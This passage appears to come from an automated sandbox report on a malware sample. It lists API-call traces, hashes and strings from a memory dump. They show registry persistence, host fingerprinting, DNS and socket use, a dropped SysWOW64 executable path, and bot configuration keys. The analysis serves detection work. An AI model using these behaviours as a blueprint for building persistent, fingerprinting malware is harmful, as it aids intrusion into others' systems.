                                                                                        • Instruction ID: f6ae14967cc974031228e7e43c762512b4d08b1e66cabe9240ba370011254f5c
                                                                                        • Opcode Fuzzy Hash: b32e78c839a30f2d4cc9a7943ed2d968975b2311285d2b410b102ee03917ac64
                                                                                        • Instruction Fuzzy Hash: 2F816B71D0120AAFDB21DFA4C944FEEBBBCAF4C784F09816AE615E2140D7758645CBA2
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F83F3
                                                                                        • RegQueryValueExA.KERNELBASE(03100750,?,00000000,?,030F8893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F8414
                                                                                        • RegSetValueExA.KERNELBASE(03100750,?,00000000,00000004,030F8893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F8441
                                                                                        • RegCloseKey.ADVAPI32(03100750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F844A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$localcfg
                                                                                        • API String ID: 237177642-1954108138
                                                                                        • Opcode ID: 753452249ada0b04f71f97b6c655c612c3140987f6ec4d4b02351f0207863855
                                                                                        • Instruction ID: 39fee1603a0a4d1629cce4192694b3aa8a25b47a2c139f1fcbcf8df44c2cbfad
                                                                                        • Opcode Fuzzy Hash: 753452249ada0b04f71f97b6c655c612c3140987f6ec4d4b02351f0207863855
                                                                                        • Instruction Fuzzy Hash: 1CC1B475D4220CBFEB51EBA4DD84EFEB7BCEB08704F148465F704A6450EA715A85CB21
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 030F1DC6
                                                                                        • GetSystemInfo.KERNELBASE(?), ref: 030F1DE8
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 030F1E03
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030F1E0A
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 030F1E1B
                                                                                        • GetTickCount.KERNEL32 ref: 030F1FC9
                                                                                          • Part of subcall function 030F1BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 030F1C15
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                        • API String ID: 4207808166-1381319158
                                                                                        • Opcode ID: 08c337a0e1b9d2b562d938a37c23691be04cfc9a9dbb27aade9b34fb0e88e640
                                                                                        • Instruction ID: 83474a3073b73943995f58cfe3220034d855703bf7e27b04c31b990fe212a685
                                                                                        • Opcode Fuzzy Hash: 08c337a0e1b9d2b562d938a37c23691be04cfc9a9dbb27aade9b34fb0e88e640
                                                                                        • Instruction Fuzzy Hash: 0951D7B0905344AFE364EF75CC85F6BBAECFF88608F04091DF6558A952D7B4A504C7A1
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,75920F10,00000000), ref: 030F7472
                                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,75920F10,00000000), ref: 030F74F0
                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,75920F10,00000000), ref: 030F7528
                                                                                        • ___ascii_stricmp.LIBCMT ref: 030F764D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,75920F10,00000000), ref: 030F76E7
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 030F7706
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 030F7717
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,75920F10,00000000), ref: 030F7745
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 030F77EF
                                                                                          • Part of subcall function 030FF1A5: lstrlenA.KERNEL32(000000C8,000000E4,031022F8,000000C8,030F7150,?), ref: 030FF1AD
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 030F778F
                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F77E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "
                                                                                        • API String ID: 3433985886-123907689
                                                                                        • Opcode ID: 53939079233d825518327bc185546f415012db23f4d82f414c9fdb524ad6422e
                                                                                        • Instruction ID: 577af8449f2b65148392abb231476ad1797fb41ce132757dab6a66356dc2cf8f
                                                                                        • Opcode Fuzzy Hash: 53939079233d825518327bc185546f415012db23f4d82f414c9fdb524ad6422e
                                                                                        • Instruction Fuzzy Hash: 4EC1C375902209AFDB11DBA4DC44FEFBBFDEF48740F140495E604AA590EB71DA84CB61
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 030F677E
                                                                                        • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 030F679A
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 030F67B0
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 030F67BF
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 030F67D3
                                                                                        • ReadFile.KERNELBASE(000000FF,?,00000040,030F8244,00000000,?,75920F10,00000000), ref: 030F6807
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F681F
                                                                                        • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 030F683E
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F685C
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000028,030F8244,00000000,?,75920F10,00000000), ref: 030F688B
                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,75920F10,00000000), ref: 030F6906
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000000,030F8244,00000000,?,75920F10,00000000), ref: 030F691C
                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,75920F10,00000000), ref: 030F6971
                                                                                          • Part of subcall function 030FEC2E: GetProcessHeap.KERNEL32(00000000,030FEA27,00000000,030FEA27,00000000), ref: 030FEC41
                                                                                          • Part of subcall function 030FEC2E: RtlFreeHeap.NTDLL(00000000), ref: 030FEC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 1400801100-0
                                                                                        • Opcode ID: 93270c00b45f7677c530c52fc23fce52d24e68a8f2bb95a927509edf0d5277af
                                                                                        • Instruction ID: babf2bd29612583b1be685300fbb17a07dc2bb2f8b1c3cb438773ab5c343267a
                                                                                        • Opcode Fuzzy Hash: 93270c00b45f7677c530c52fc23fce52d24e68a8f2bb95a927509edf0d5277af
                                                                                        • Instruction Fuzzy Hash: 47712971C0521DEFDF11DFA4CC80AEEBBB9FB08354F14456AE615A6190E7319E92CB60
                                                                                        APIs
                                                                                        • htons.WS2_32(030FCA1D), ref: 030FF34D
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 030FF367
                                                                                        • closesocket.WS2_32(00000000), ref: 030FF375
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        • Opcode ID: a61ce7807bd8ccd9f2ceb6372a55763db17dc71534fa371650b4f363ac86114d
                                                                                        • Instruction ID: 1ed8ec1eb73a02134d697423bcc75af05385e0873aef64235bb5f62b8049b9cc
                                                                                        • Opcode Fuzzy Hash: a61ce7807bd8ccd9f2ceb6372a55763db17dc71534fa371650b4f363ac86114d
                                                                                        • Instruction Fuzzy Hash: 32317A76905219AFDB10EFA4DC84AEE7BBCEF8C314F104166FA15E3140E7709A818BA0
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 030F4070
                                                                                        • ExitProcess.KERNEL32 ref: 030F4121
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CreateEventExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2404124870-0
                                                                                        • Opcode ID: d1a510f80c2385556d38d669575a2293ae2aa0287b59e31cd0e59e3d98a6b566
                                                                                        • Instruction ID: 269b60f3c5a8789e013b2c0ee1a404a1c64bd13158fd5410b6937e98dd72eecd
                                                                                        • Opcode Fuzzy Hash: d1a510f80c2385556d38d669575a2293ae2aa0287b59e31cd0e59e3d98a6b566
                                                                                        • Instruction Fuzzy Hash: 1D5191B5D01219BFEB20EAA68D45FFFBABCEF59754F040065FB00A6480E7708A45C7A1
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,030F2F01,?,030F20FF,03102000), ref: 030F2D3A
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 030F2D4A
                                                                                        • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 030F2D61
                                                                                        • DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,?,00000000), ref: 030F2D77
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 030F2D99
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 030F2DA0
                                                                                        • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 030F2DCB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcessQuery_lstrcpyn
                                                                                        • String ID: DnsQuery_A$dnsapi.dll
                                                                                        • API String ID: 233223969-3847274415
                                                                                        • Opcode ID: 0697783be81f15f33577fe29c76d4bd1ec21afee390abed4f956c3dea097c7f3
                                                                                        • Instruction ID: abb36fb52f4021de1afcc0ea51101453871da6562191367ebf54925f888f9c3c
                                                                                        • Opcode Fuzzy Hash: 0697783be81f15f33577fe29c76d4bd1ec21afee390abed4f956c3dea097c7f3
                                                                                        • Instruction Fuzzy Hash: C2218E75902625AFCB22DF64DC44AAEBBBCEF0CB54F054851FA05EB504D7B0998187E0
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F815F
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,030FA45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F8187
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,030FA45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F81BE
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F8210
                                                                                          • Part of subcall function 030F675C: SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 030F677E
                                                                                          • Part of subcall function 030F675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 030F679A
                                                                                          • Part of subcall function 030F675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 030F67B0
                                                                                          • Part of subcall function 030F675C: SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 030F67BF
                                                                                          • Part of subcall function 030F675C: GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 030F67D3
                                                                                          • Part of subcall function 030F675C: ReadFile.KERNELBASE(000000FF,?,00000040,030F8244,00000000,?,75920F10,00000000), ref: 030F6807
                                                                                          • Part of subcall function 030F675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F681F
                                                                                          • Part of subcall function 030F675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 030F683E
                                                                                          • Part of subcall function 030F675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F685C
                                                                                          • Part of subcall function 030FEC2E: GetProcessHeap.KERNEL32(00000000,030FEA27,00000000,030FEA27,00000000), ref: 030FEC41
                                                                                          • Part of subcall function 030FEC2E: RtlFreeHeap.NTDLL(00000000), ref: 030FEC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                        • API String ID: 124786226-2650950432
                                                                                        • Opcode ID: a1080ce91ce78089ebe275093811a2594044ce2df9bc81520ba7ba01844c5fa4
                                                                                        • Instruction ID: 89e032de00ecbbdc5fb4c24bc837504ae37ac6d42a5ed0c56d7f039ed1df4fc9
                                                                                        • Opcode Fuzzy Hash: a1080ce91ce78089ebe275093811a2594044ce2df9bc81520ba7ba01844c5fa4
                                                                                        • Instruction Fuzzy Hash: 9641B975902209BFEB54FB94DD84DFE77BCEB08304F14886AE701E6404E671AA85CB61
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 030F1AD4
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 030F1AE9
                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 030F1B20
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AdaptersAddressAddressesLibraryLoadProc
                                                                                        • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                        • API String ID: 3646706440-1087626847
                                                                                        • Opcode ID: be144b6bbf978b857318f9eec703a728c85bf3f1f2a363e8ea5d6a45ad743bde
                                                                                        • Instruction ID: c9a68f72355302e077854085e26327dc67e91228e50bc39ca824a62790babb73
                                                                                        • Opcode Fuzzy Hash: be144b6bbf978b857318f9eec703a728c85bf3f1f2a363e8ea5d6a45ad743bde
                                                                                        • Instruction Fuzzy Hash: 6911D375E03228FFCB59DBA4CC84CEEFBFAEB48B10B184096E215E7544E6704A40CB90
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,030FE5F2,00000000,00020119,030FE5F2,031022F8), ref: 030FE3E6
                                                                                        • RegQueryValueExA.ADVAPI32(030FE5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 030FE44E
                                                                                        • RegQueryValueExA.ADVAPI32(030FE5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 030FE482
                                                                                        • RegQueryValueExA.ADVAPI32(030FE5F2,?,00000000,?,80000001,?), ref: 030FE4CF
                                                                                        • RegCloseKey.ADVAPI32(030FE5F2,?,?,?,?,000000C8,000000E4), ref: 030FE520
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1586453840-0
                                                                                        • Opcode ID: 536c89608dc75d9a61838e0a3afad5bcaae2c9fcf61e5441204a4ea51e941094
                                                                                        • Instruction ID: 3f23db629d4bc14e7b6c17f5b8a8b1c59d4a2c7e1a2e30546317bea6c3ebd5e6
                                                                                        • Opcode Fuzzy Hash: 536c89608dc75d9a61838e0a3afad5bcaae2c9fcf61e5441204a4ea51e941094
                                                                                        • Instruction Fuzzy Hash: 894136B6D0021DAFEF11EF98DC84DEEBBBDFB08244F144466EA10A6560E3719A55CB60
                                                                                        APIs
                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 030FF2A0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 030FF2C0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 030FF2DD
                                                                                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 030FF2EC
                                                                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 030FF2FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: setsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 3981526788-0
                                                                                        • Opcode ID: 49efab75608c8959709b13be584038fa02a9640ebdefe6fd9df5de26ff72c61a
                                                                                        • Instruction ID: 069329536af65fc76d6aa68573daa77b064b4de1be99a3e96d745a355697a267
                                                                                        • Opcode Fuzzy Hash: 49efab75608c8959709b13be584038fa02a9640ebdefe6fd9df5de26ff72c61a
                                                                                        • Instruction Fuzzy Hash: FD110AB2A40248BAEF11DF94CD81FDE7FBDEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                        APIs
                                                                                          • Part of subcall function 030F1AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 030F1AD4
                                                                                          • Part of subcall function 030F1AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 030F1AE9
                                                                                          • Part of subcall function 030F1AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 030F1B20
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 030F1C15
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 030F1C51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: hi_id$localcfg
                                                                                        • API String ID: 2794401326-2393279970
                                                                                        • Opcode ID: fe5e74660f1b6fcbe43d43993dcdda1ec89d09624d6c10c71686a79de47f7321
                                                                                        • Instruction ID: a1ac73b25b8a0b1019764c33e06d65e2a100d10d31b2cf3876cef5cc306e3298
                                                                                        • Opcode Fuzzy Hash: fe5e74660f1b6fcbe43d43993dcdda1ec89d09624d6c10c71686a79de47f7321
                                                                                        • Instruction Fuzzy Hash: 19018076A01118FFEB58DAE8C8C59EFBABCAB48785F140475E702E3500D6709E4486A0
                                                                                        APIs
                                                                                          • Part of subcall function 030F1AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 030F1AD4
                                                                                          • Part of subcall function 030F1AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 030F1AE9
                                                                                          • Part of subcall function 030F1AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 030F1B20
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 030F1BA3
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,030F1EFD,00000000,00000000,00000000,00000000), ref: 030F1BB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2794401326-1857712256
                                                                                        • Opcode ID: 97a631e6780fbbc2d4a58f50c3282be8f06e7beb44706f28815f174bd3f5462e
                                                                                        • Instruction ID: fd93d5a5498a39cdc2c1543ba36c9521c6c6b897ab008a1593811f2f5152d6e8
                                                                                        • Opcode Fuzzy Hash: 97a631e6780fbbc2d4a58f50c3282be8f06e7beb44706f28815f174bd3f5462e
                                                                                        • Instruction Fuzzy Hash: 1B014BB6D0110CFFEB00DAE9C8819EFFABCAB88654F150562A701E7140D5709E0887F0
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(00000001), ref: 030F2693
                                                                                        • gethostbyname.WS2_32(00000001), ref: 030F269F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 1594361348-2401304539
                                                                                        • Opcode ID: 53716edb4c5f536332cd71b90e0ce27ee5c2bddd3db8fc88839e8039cd73e5dd
                                                                                        • Instruction ID: 59a39f71c20b938829cfe68a4a69074063bb89dd3bc4d5e5333c6077c445d210
                                                                                        • Opcode Fuzzy Hash: 53716edb4c5f536332cd71b90e0ce27ee5c2bddd3db8fc88839e8039cd73e5dd
                                                                                        • Instruction Fuzzy Hash: 86E0C2342050118FDB90EB28F444BC577ECEF4E230F0A4980F540C3194CB70D8C08790
                                                                                        APIs
                                                                                          • Part of subcall function 030FDD05: GetTickCount.KERNEL32 ref: 030FDD0F
                                                                                          • Part of subcall function 030FDD05: InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
                                                                                          • Part of subcall function 030FDD05: GetCurrentThreadId.KERNEL32 ref: 030FDD53
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,75920F10,?,00000000,?,030FA445), ref: 030FE558
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,75920F10,?,00000000,?,030FA445), ref: 030FE583
                                                                                        • CloseHandle.KERNEL32(00000000,?,75920F10,?,00000000,?,030FA445), ref: 030FE5B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                        • String ID:
                                                                                        • API String ID: 3683885500-0
                                                                                        • Opcode ID: 658c8c843521ececa4cdc41abed4697d7a48672a9d790330e900ef7099734f9c
                                                                                        • Instruction ID: 39103c7537f2557e6b60e29d33974ec68d65190ff6b62527f005bc71c294104f
                                                                                        • Opcode Fuzzy Hash: 658c8c843521ececa4cdc41abed4697d7a48672a9d790330e900ef7099734f9c
                                                                                        • Instruction Fuzzy Hash: F5213AB9A423047FE164F6229C09FFF794CDBD8B54F000414BB09A95DAEAA5D500C1B1
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000003E8), ref: 030F88A5
                                                                                          • Part of subcall function 030FF04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4), ref: 030FF089
                                                                                          • Part of subcall function 030FF04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4,000000C8), ref: 030FF093
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem$Sleep
                                                                                        • String ID: localcfg$rresolv
                                                                                        • API String ID: 1561729337-486471987
                                                                                        • Opcode ID: 8f3e9c5e3df4bc99d33c2e63df6b9a65d19b3950f22f67500b8a5ac6b69179da
                                                                                        • Instruction ID: e2b6668a753134018888546f8bcaa1b72e0973f05df8d0910bc519b906d7364d
                                                                                        • Opcode Fuzzy Hash: 8f3e9c5e3df4bc99d33c2e63df6b9a65d19b3950f22f67500b8a5ac6b69179da
                                                                                        • Instruction Fuzzy Hash: 2A21F73554A3016FF318F764AC46BEE3AD8AB89754F644819F708998C0EFF5858181B2
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,031022F8,030F42B6,00000000,00000001,031022F8,00000000,?,030F98FD), ref: 030F4021
                                                                                        • GetLastError.KERNEL32(?,030F98FD,00000001,00000100,031022F8,030FA3C7), ref: 030F402C
                                                                                        • Sleep.KERNEL32(000001F4,?,030F98FD,00000001,00000100,031022F8,030FA3C7), ref: 030F4046
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 408151869-0
                                                                                        • Opcode ID: db15b71f9c3a67e76354e6947c62b62c92c501d8313c15c2e4e80c94861a3309
                                                                                        • Instruction ID: a8dce3bf91c1f455d5f16fda8a5894da591da64050e92fe6c7e5c5373e573803
                                                                                        • Opcode Fuzzy Hash: db15b71f9c3a67e76354e6947c62b62c92c501d8313c15c2e4e80c94861a3309
                                                                                        • Instruction Fuzzy Hash: B4F0A0322412016FE7759B2AAC49B6F72A5EB8A724F2D4B24F7B6E24D4C67044C19F24
                                                                                        APIs
                                                                                        • GetEnvironmentVariableA.KERNEL32(030FDC19,?,00000104), ref: 030FDB7F
                                                                                        • lstrcpyA.KERNEL32(?,031028F8), ref: 030FDBA4
                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000080,00000000), ref: 030FDBC2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEnvironmentFileVariablelstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2536392590-0
                                                                                        • Opcode ID: f421360448f7b76d690e53df83d26dd556521098b2f02561d45a75e36aaf07c7
                                                                                        • Instruction ID: 45977efec76b17feb1a0394ec268e7ff4bb81e07356776f2403402fb919a4bc6
                                                                                        • Opcode Fuzzy Hash: f421360448f7b76d690e53df83d26dd556521098b2f02561d45a75e36aaf07c7
                                                                                        • Instruction Fuzzy Hash: 25F09070100249ABEF10EF64DD49FE93BA9AB08348F104194BB51A40D4D7F2D585CB20
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 030FEC5E
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 030FEC72
                                                                                        • GetTickCount.KERNEL32 ref: 030FEC78
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$CountFileInformationSystemTickVolume
                                                                                        • String ID:
                                                                                        • API String ID: 1209300637-0
                                                                                        • Opcode ID: f7df6b5c6174dd33a683fdb1216c61bb02de65034d4a42df8d45735b9c3adb80
                                                                                        • Instruction ID: 91a154379f400d7b444c05bb16259f208c43a8d018144abf3d830725c8ee5537
                                                                                        • Opcode Fuzzy Hash: f7df6b5c6174dd33a683fdb1216c61bb02de65034d4a42df8d45735b9c3adb80
                                                                                        • Instruction Fuzzy Hash: 6BE09AF5810108BFE705ABB0DD4AE7B77BCEB0C218F500650B911D6084DAB09A448B70
                                                                                        APIs
